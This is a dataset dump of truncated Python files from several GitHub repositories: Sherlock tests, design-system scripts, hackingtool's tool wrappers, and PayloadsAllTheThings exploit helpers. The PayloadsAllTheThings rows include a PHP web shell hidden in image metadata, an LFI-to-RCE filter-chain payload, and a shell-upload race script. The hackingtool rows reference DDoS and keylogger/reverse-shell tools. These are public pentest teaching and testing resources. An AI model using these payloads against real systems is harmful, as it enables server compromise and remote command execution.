repo_full_name
stringlengths
6
93
repo_url
stringlengths
25
112
repo_api_url
stringclasses
28 values
owner
stringclasses
28 values
repo_name
stringclasses
28 values
description
stringclasses
28 values
stars
int64
617
98.8k
forks
int64
31
355
watchers
int64
990
999
license
stringclasses
2 values
default_branch
stringclasses
2 values
repo_created_at
timestamp[s]date
2012-07-24 23:12:50
2025-06-16 08:07:28
repo_updated_at
timestamp[s]date
2026-02-23 15:23:15
2026-05-03 18:52:12
repo_topics
listlengths
0
13
repo_languages
unknown
is_fork
bool
1 class
open_issues
int64
3
104
file_path
stringlengths
3
208
file_name
stringclasses
509 values
file_extension
stringclasses
1 value
file_size_bytes
int64
101
84k
file_url
stringclasses
627 values
file_raw_url
stringclasses
627 values
file_sha
stringclasses
624 values
language
stringclasses
8 values
parsed_at
stringdate
2026-05-04 01:12:36
2026-05-04 19:41:55
text
stringlengths
100
102k
sherlock-project/sherlock
https://github.com/sherlock-project/sherlock
null
null
null
null
82,860
null
null
mit
null
null
null
null
null
null
null
tests/test_validate_targets.py
null
null
null
null
null
null
Python
2026-05-04T02:16:43.636175
import pytest import re import rstr from sherlock_project.sherlock import sherlock from sherlock_project.notify import QueryNotify from sherlock_project.result import QueryResult, QueryStatus FALSE_POSITIVE_ATTEMPTS: int = 2 # Since the usernames are randomly generated, it's POSSIBLE that a real username can be h...
sherlock-project/sherlock
https://github.com/sherlock-project/sherlock
null
null
null
null
82,860
null
null
mit
null
null
null
null
null
null
null
tests/test_version.py
null
null
null
null
null
null
Python
2026-05-04T02:16:43.679937
import os from sherlock_interactives import Interactives import sherlock_project def test_versioning() -> None: # Ensure __version__ matches version presented to the user assert sherlock_project.__version__ in Interactives.run_cli("--version") # Ensure __init__ is single source of truth for __version__ in ...
swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings
null
null
null
null
77,439
null
null
mit
null
null
null
null
null
null
null
Server Side Request Forgery/Files/ip.py
null
null
null
null
null
null
Python
2026-05-04T02:16:47.116066
#!/usr/bin/python # coding=utf-8 # https://raw.githubusercontent.com/cujanovic/SSRF-Testing/master/ip.py from __future__ import print_function from builtins import oct from builtins import str from builtins import hex from builtins import range from random import * from io import open import datetime import string impo...
swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings
null
null
null
null
77,439
null
null
mit
null
null
null
null
null
null
null
Upload Insecure Files/Picture Metadata/Build_image_to_LFI.py
null
null
null
null
null
null
Python
2026-05-04T02:16:47.120377
from __future__ import print_function from PIL import Image # Shellcodes - Bypass included : Keyword Recognition : System, GET, php # --- How to use : http://localhost/shell.php?c=echo%20'<pre>';ls #shellcode = "<?=@`$_GET[c]`;" shellcode = "<?php system($_GET['c']); ?>" # --- How to use : http://localhost/shell.php...
swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings
null
null
null
null
77,439
null
null
mit
null
null
null
null
null
null
null
Upload Insecure Files/CVE FFmpeg HLS/gen_xbin_avi.py
null
null
null
null
null
null
Python
2026-05-04T02:16:47.120865
#!/usr/bin/env python3 from builtins import bytes from builtins import map from builtins import zip from builtins import range import struct import argparse import random import string AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\...
swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings
null
null
null
null
77,439
null
null
mit
null
null
null
null
null
null
null
File Inclusion/Files/uploadlfi.py
null
null
null
null
null
null
Python
2026-05-04T02:16:47.124272
from __future__ import print_function from builtins import range import itertools import requests import string import sys print('[+] Trying to win the race') f = {'file': open('shell.php', 'rb')} for _ in range(4096 * 4096): requests.post('http://target.com/index.php?c=index.php', f) print('[+] Bruteforcing the...
swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings
null
null
null
null
77,439
null
null
mit
null
null
null
null
null
null
null
File Inclusion/Files/LFI2RCE.py
null
null
null
null
null
null
Python
2026-05-04T02:16:47.124804
import requests url = "http://localhost:8000/chall.php" file_to_use = "/etc/passwd" command = "id" #<?=`$_GET[0]`;;?> base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4" conversions = { 'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2', 'B': 'convert.ico...
swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings
null
null
null
null
77,439
null
null
mit
null
null
null
null
null
null
null
Web Sockets/Files/ws-harness.py
null
null
null
null
null
null
Python
2026-05-04T02:16:47.133266
#!/usr/bin/python from __future__ import print_function import socket,ssl from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer from websocket import create_connection, WebSocket from urlparse import parse_qs import argparse import os LOOP_BACK_PORT_NUMBER = 8000 def FuzzWebSocket(fuzz_value): print(fuzz_v...
swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings
null
null
null
null
77,439
null
null
mit
null
null
null
null
null
null
null
File Inclusion/Files/phpinfolfi.py
null
null
null
null
null
null
Python
2026-05-04T02:16:47.133931
#!/usr/bin/python # https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf # The following line is not required but supposedly optimizes code. # However, this breaks on some Python 2 installations, where the future module version installed is > 0.16. This can be a pain to revert. # ...
swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings
null
null
null
null
77,439
null
null
mit
null
null
null
null
null
null
null
Upload Insecure Files/Picture Compression/createBulletproofJPG.py
null
null
null
null
null
null
Python
2026-05-04T02:16:47.136928
#!/usr/bin/python """ Bulletproof Jpegs Generator Copyright (C) 2012 Damien "virtualabs" Cauquil This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License,...
swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings
null
null
null
null
77,439
null
null
mit
null
null
null
null
null
null
null
Upload Insecure Files/Configuration Python __init__.py/python-generate-init.py
null
null
null
null
null
null
Python
2026-05-04T02:16:47.137569
# Generating "evil" zip file # Based on the work of Ajin Abraham # Vuln website : https://github.com/ajinabraham/bad_python_extract # More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution # Warning 1: need a restart from the server OR debug=True # Warning 2: you won'...
swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings
null
null
null
null
77,439
null
null
mit
null
null
null
null
null
null
null
Upload Insecure Files/CVE FFmpeg HLS/gen_avi_bypass.py
null
null
null
null
null
null
Python
2026-05-04T02:16:47.160261
import struct import argparse AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design/scripts/cip/core.py
null
null
null
null
null
null
Python
2026-05-04T02:16:55.310320
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CIP Design Core - BM25 search engine for Corporate Identity Program design guidelines """ import csv import re from pathlib import Path from math import log from collections import defaultdict # ============ CONFIGURATION ============ DATA_DIR = Path(__file__).parent...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design-system/scripts/slide-token-validator.py
null
null
null
null
null
null
Python
2026-05-04T02:16:55.318283
#!/usr/bin/env python3 """ Slide Token Validator (Legacy Wrapper) Now delegates to html-token-validator.py for unified HTML validation. For new usage, prefer: python html-token-validator.py --type slides python html-token-validator.py --type infographics python html-token-validator.py # All...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design/scripts/cip/generate.py
null
null
null
null
null
null
Python
2026-05-04T02:16:55.326477
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CIP Design Generator - Generate corporate identity mockups using Gemini Nano Banana Uses Gemini's native image generation (Nano Banana Flash/Pro) for high-quality mockups. Supports text-and-image-to-image generation for using actual brand logos. - gemini-2.5-flash-im...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design-system/scripts/slide_search_core.py
null
null
null
null
null
null
Python
2026-05-04T02:16:55.332624
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Slide Search Core - BM25 search engine for slide design databases """ import csv import re from pathlib import Path from math import log from collections import defaultdict # ============ CONFIGURATION ============ DATA_DIR = Path(__file__).parent.parent / "data" MAX...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design/scripts/cip/search.py
null
null
null
null
null
null
Python
2026-05-04T02:16:55.342131
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CIP Design Search CLI - Search corporate identity design guidelines """ import argparse import json import sys from pathlib import Path # Add parent directory for imports sys.path.insert(0, str(Path(__file__).parent)) from core import search, search_all, get_cip_brie...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design-system/scripts/generate-slide.py
null
null
null
null
null
null
Python
2026-05-04T02:16:55.350655
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Slide Generator - Generates HTML slides using design tokens ALL styles MUST use CSS variables from design-tokens.css NO hardcoded colors, fonts, or spacing allowed """ import argparse import json from pathlib import Path from datetime import datetime # Paths SCRIPT_D...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design-system/scripts/html-token-validator.py
null
null
null
null
null
null
Python
2026-05-04T02:16:55.352043
#!/usr/bin/env python3 """ HTML Design Token Validator Ensures all HTML assets (slides, infographics, etc.) use design tokens. Source of truth: assets/design-tokens.css Usage: python html-token-validator.py # Validate all HTML assets python html-token-validator.py --type slides # Validate o...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design-system/scripts/search-slides.py
null
null
null
null
null
null
Python
2026-05-04T02:16:55.359321
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Slide Search CLI - Search slide design databases for strategies, layouts, copy, and charts """ import sys import json import argparse from slide_search_core import ( search, search_all, AVAILABLE_DOMAINS, search_with_context, get_layout_for_goal, get_typograph...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design-system/scripts/fetch-background.py
null
null
null
null
null
null
Python
2026-05-04T02:16:56.401203
#!/usr/bin/env python3 """ Background Image Fetcher Fetches real images from Pexels for slide backgrounds. Uses web scraping (no API key required) or WebFetch tool integration. """ import json import csv import re import sys from pathlib import Path # Project root relative to this script PROJECT_ROOT = Path(__file__)...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design/scripts/cip/render-html.py
null
null
null
null
null
null
Python
2026-05-04T02:16:56.858761
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CIP HTML Presentation Renderer Generates a professional HTML presentation from CIP mockup images with detailed descriptions, concepts, and brand guidelines. """ import argparse import json import os import sys import base64 from pathlib import Path from datetime impo...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design/scripts/logo/core.py
null
null
null
null
null
null
Python
2026-05-04T02:16:56.933823
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Logo Design Core - BM25 search engine for logo design guidelines """ import csv import re from pathlib import Path from math import log from collections import defaultdict # ============ CONFIGURATION ============ DATA_DIR = Path(__file__).parent.parent.parent / "dat...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/ui-styling/scripts/tests/test_tailwind_config_gen.py
null
null
null
null
null
null
Python
2026-05-04T02:16:57.056953
"""Tests for tailwind_config_gen.py""" from pathlib import Path import pytest # Add parent directory to path for imports import sys sys.path.insert(0, str(Path(__file__).parent.parent)) from tailwind_config_gen import TailwindConfigGenerator class TestTailwindConfigGenerator: """Test TailwindConfigGenerator c...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/ui-styling/scripts/shadcn_add.py
null
null
null
null
null
null
Python
2026-05-04T02:16:57.063640
#!/usr/bin/env python3 """ shadcn/ui Component Installer Add shadcn/ui components to project with automatic dependency handling. Wraps shadcn CLI for programmatic component installation. """ import argparse import json import subprocess import sys from pathlib import Path from typing import List, Optional class Sha...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/ui-styling/scripts/tailwind_config_gen.py
null
null
null
null
null
null
Python
2026-05-04T02:16:57.068436
#!/usr/bin/env python3 """ Tailwind CSS Configuration Generator Generate tailwind.config.js/ts with custom theme configuration. Supports colors, fonts, spacing, breakpoints, and plugin recommendations. """ import argparse import json import sys from pathlib import Path from typing import Any, Dict, List, Optional c...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/ui-styling/scripts/tests/test_shadcn_add.py
null
null
null
null
null
null
Python
2026-05-04T02:16:57.070829
"""Tests for shadcn_add.py""" import json import subprocess from pathlib import Path from unittest.mock import MagicMock, mock_open, patch import pytest # Add parent directory to path for imports import sys sys.path.insert(0, str(Path(__file__).parent.parent)) from shadcn_add import ShadcnInstaller class TestShad...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
cli/assets/data/_sync_all.py
null
null
null
null
null
null
Python
2026-05-04T02:16:57.282882
#!/usr/bin/env python3 """ Sync colors.csv and ui-reasoning.csv with the updated products.csv (161 entries). - Remove deleted product types - Rename mismatched entries - Add new entries for missing product types - Keep colors.csv aligned 1:1 with products.csv - Renumber everything """ import csv, os, json BASE = os.pa...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
cli/assets/scripts/design_system.py
null
null
null
null
null
null
Python
2026-05-04T02:16:57.949939
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Design System Generator - Aggregates search results and applies reasoning to generate comprehensive design system recommendations. Usage: from design_system import generate_design_system result = generate_design_system("SaaS dashboard", "My Project") ...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
cli/assets/scripts/core.py
null
null
null
null
null
null
Python
2026-05-04T02:16:58.123285
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ UI/UX Pro Max Core - BM25 search engine for UI/UX style guides """ import csv import re from pathlib import Path from math import log from collections import defaultdict # ============ CONFIGURATION ============ DATA_DIR = Path(__file__).parent.parent / "data" MAX_RE...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
src/ui-ux-pro-max/scripts/design_system.py
null
null
null
null
null
null
Python
2026-05-04T02:16:58.166436
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Design System Generator - Aggregates search results and applies reasoning to generate comprehensive design system recommendations. Usage: from design_system import generate_design_system result = generate_design_system("SaaS dashboard", "My Project") ...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
cli/assets/scripts/search.py
null
null
null
null
null
null
Python
2026-05-04T02:16:58.174801
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ UI/UX Pro Max Search - BM25 search engine for UI/UX style guides Usage: python search.py "<query>" [--domain <domain>] [--stack <stack>] [--max-results 3] python search.py "<query>" --design-system [-p "Project Name"] python search.py "<query>" --de...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
src/ui-ux-pro-max/data/_sync_all.py
null
null
null
null
null
null
Python
2026-05-04T02:16:58.175522
#!/usr/bin/env python3 """ Sync colors.csv and ui-reasoning.csv with the updated products.csv (161 entries). - Remove deleted product types - Rename mismatched entries - Add new entries for missing product types - Keep colors.csv aligned 1:1 with products.csv - Renumber everything """ import csv, os, json BASE = os.pa...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
src/ui-ux-pro-max/scripts/core.py
null
null
null
null
null
null
Python
2026-05-04T02:16:58.203698
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ UI/UX Pro Max Core - BM25 search engine for UI/UX style guides """ import csv import re from pathlib import Path from math import log from collections import defaultdict # ============ CONFIGURATION ============ DATA_DIR = Path(__file__).parent.parent / "data" MAX_RE...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design/scripts/logo/search.py
null
null
null
null
null
null
Python
2026-05-04T02:17:01.498962
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Logo Design Search - CLI for searching logo design guidelines Usage: python search.py "<query>" [--domain <domain>] [--max-results 3] python search.py "<query>" --design-brief [-p "Brand Name"] Domains: style, color, industry """ import argparse from core impo...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design/scripts/icon/generate.py
null
null
null
null
null
null
Python
2026-05-04T02:17:01.534874
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Icon Generation Script using Gemini 3.1 Pro Preview API Generates SVG icons via text generation (SVG is XML text format) Model: gemini-3.1-pro-preview - best thinking, token efficiency, factual consistency Usage: python generate.py --prompt "settings gear icon" -...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
.claude/skills/design/scripts/logo/generate.py
null
null
null
null
null
null
Python
2026-05-04T02:17:02.047539
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Logo Generation Script using Gemini Nano Banana API Uses Gemini 2.5 Flash Image and Gemini 3 Pro Image Preview models Models: - Nano Banana (default): gemini-2.5-flash-image - fast, high-volume, low-latency - Nano Banana Pro (--pro): gemini-3-pro-image-preview - profe...
nextlevelbuilder/ui-ux-pro-max-skill
https://github.com/nextlevelbuilder/ui-ux-pro-max-skill
null
null
null
null
73,580
null
null
mit
null
null
null
null
null
null
null
src/ui-ux-pro-max/scripts/search.py
null
null
null
null
null
null
Python
2026-05-04T02:17:03.314649
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ UI/UX Pro Max Search - BM25 search engine for UI/UX style guides Usage: python search.py "<query>" [--domain <domain>] [--stack <stack>] [--max-results 3] python search.py "<query>" --design-system [-p "Project Name"] python search.py "<query>" --de...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
generate_readme.py
null
null
null
null
null
null
Python
2026-05-04T02:17:06.054461
# coding=utf-8 import re from rich.console import Console from rich.theme import Theme from core import HackingTool from core import HackingToolsCollection from hackingtool import all_tools _theme = Theme({"purple": "#7B61FF"}) console = Console(theme=_theme) def sanitize_anchor(s): return re.sub(r"\W", "-", s...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
core.py
null
null
null
null
null
null
Python
2026-05-04T02:17:06.066519
import os import shutil import sys import webbrowser from collections.abc import Callable from platform import system from rich import box from rich.console import Console from rich.panel import Panel from rich.prompt import Prompt from rich.table import Table from rich.text import Text from rich.theme import Theme fr...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
os_detect.py
null
null
null
null
null
null
Python
2026-05-04T02:17:06.071057
import platform import shutil from dataclasses import dataclass, field from pathlib import Path @dataclass class OSInfo: system: str # "linux", "macos", "windows", "unknown" distro_id: str = "" # "kali", "ubuntu", "arch", "fedora", etc. distro_like: str = "" # "debia...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
constants.py
null
null
null
null
null
null
Python
2026-05-04T02:17:06.071659
from pathlib import Path import platform import shutil as _shutil # ── Repository ──────────────────────────────────────────────────────────────── REPO_OWNER = "Z4nzu" REPO_NAME = "hackingtool" REPO_URL = f"https://github.com/{REPO_OWNER}/{REPO_NAME}.git" REPO_WEB_URL = f"https://github.com/{REPO_OWNER}/{REPO...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
hackingtool.py
null
null
null
null
null
null
Python
2026-05-04T02:17:06.077351
#!/usr/bin/env python3 import sys # ── Python version guard (must be before any other local import) ─────────────── if sys.version_info < (3, 10): print( f"[ERROR] Python 3.10 or newer is required.\n" f"You are running Python {sys.version_info.major}.{sys.version_info.minor}.\n" f"Upgrade w...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
install.py
null
null
null
null
null
null
Python
2026-05-04T02:17:06.137245
#!/usr/bin/env python3 import os import sys import shutil import subprocess from pathlib import Path # ── Python version check (must be before any other local import) ────────────── if sys.version_info < (3, 10): print( f"[ERROR] Python 3.10 or newer is required.\n" f"You are running Python {sys.ve...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/active_directory.py
null
null
null
null
null
null
Python
2026-05-04T02:17:06.148204
from core import HackingTool from core import HackingToolsCollection class BloodHound(HackingTool): TITLE = "BloodHound (AD Attack Paths)" DESCRIPTION = "Uses graph theory to reveal hidden attack paths in Active Directory/Azure environments." INSTALL_COMMANDS = [ "pip install --user bloodhound", ...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/anonsurf.py
null
null
null
null
null
null
Python
2026-05-04T02:17:06.155317
import os from core import HackingTool, HackingToolsCollection, console class AnonymouslySurf(HackingTool): TITLE = "Anonymously Surf" DESCRIPTION = ( "It automatically overwrites the RAM when the system shuts down\n" "and also changes your IP address." ) # Bug 28 fix: was "cd kali-an...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
config.py
null
null
null
null
null
null
Python
2026-05-04T02:17:06.156459
import json import logging from pathlib import Path from typing import Any from constants import USER_CONFIG_FILE, USER_TOOLS_DIR, DEFAULT_CONFIG logger = logging.getLogger(__name__) def load() -> dict[str, Any]: """Load config from disk, merging with defaults for any missing keys.""" if USER_CONFIG_FILE.ex...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/ddos.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.031435
import subprocess from rich.prompt import Prompt from core import HackingTool, HackingToolsCollection, console class DDoSTool(HackingTool): TITLE = "DDoS" SUPPORTED_OS = ["linux"] DESCRIPTION = ( "Best DDoS Attack Script With 36 Plus Methods. " "DDoS attacks for SECURITY TESTING PURPOSES...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/cloud_security.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.032925
from core import HackingTool from core import HackingToolsCollection class Prowler(HackingTool): TITLE = "Prowler (Cloud Security Scanner)" DESCRIPTION = "Open-source security tool for AWS, Azure, GCP, and Kubernetes assessments." INSTALL_COMMANDS = ["pip install --user prowler"] RUN_COMMANDS = ["prow...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/mobile_security.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.205639
from core import HackingTool from core import HackingToolsCollection class MobSF(HackingTool): TITLE = "MobSF (Mobile Security Framework)" DESCRIPTION = "All-in-one mobile app pentesting, malware analysis, and security assessment." INSTALL_COMMANDS = [ "git clone https://github.com/MobSF/Mobile-Se...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/others/email_verifier.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.206830
from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt class KnockMail(HackingTool): TITLE = "Knockmail" DESCRIPTION = "KnockMail Tool Verify If Email Exists" INSTALL_COMMANDS = [ "git clone https://github.com/heywoodlh/KnockMail....
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/others/android_attack.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.213397
from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt from rich import box class Keydroid(HackingTool): TITLE = "Keydroid" DESCRIPTION = "Android Keylogger + Reverse Shell\n" \ "[!] You have to install Some Manually Refer B...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/other_tools.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.215893
import os import subprocess from core import HackingTool, HackingToolsCollection, console from tools.others.android_attack import AndroidAttackTools from tools.others.email_verifier import EmailVerifyTools from tools.others.hash_crack import HashCrackingTools from tools.others.homograph_attacks import IDNHomographAtta...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/forensics.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.346962
import os from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.text import Text from rich.prompt import Prompt class Autopsy(HackingTool): TITLE = "Autopsy" DESCRIPTION = "Autopsy is a platform that is used by Cyber Investigators.\n" \ "[!] W...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/exploit_frameworks.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.468535
from core import HackingTool, HackingToolsCollection, console from tools.web_attack import Web2Attack from rich.panel import Panel from rich.text import Text from rich.prompt import Prompt class RouterSploit(HackingTool): TITLE = "RouterSploit" DESCRIPTION = "The RouterSploit Framework is an open-source expl...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/information_gathering.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.490153
import os import socket import subprocess import webbrowser import sys from core import HackingTool, HackingToolsCollection, console from core import clear_screen from rich.panel import Panel from rich.text import Text from rich.prompt import Prompt class NMAP(HackingTool): TITLE = "Network Map (nmap)" DESC...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/others/hash_crack.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.663821
from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt from rich import box class HashBuster(HackingTool): TITLE = "Hash Buster" DESCRIPTION = "Features: \n " \ "Automatic hash type identification \n " \ "S...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/others/homograph_attacks.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.705569
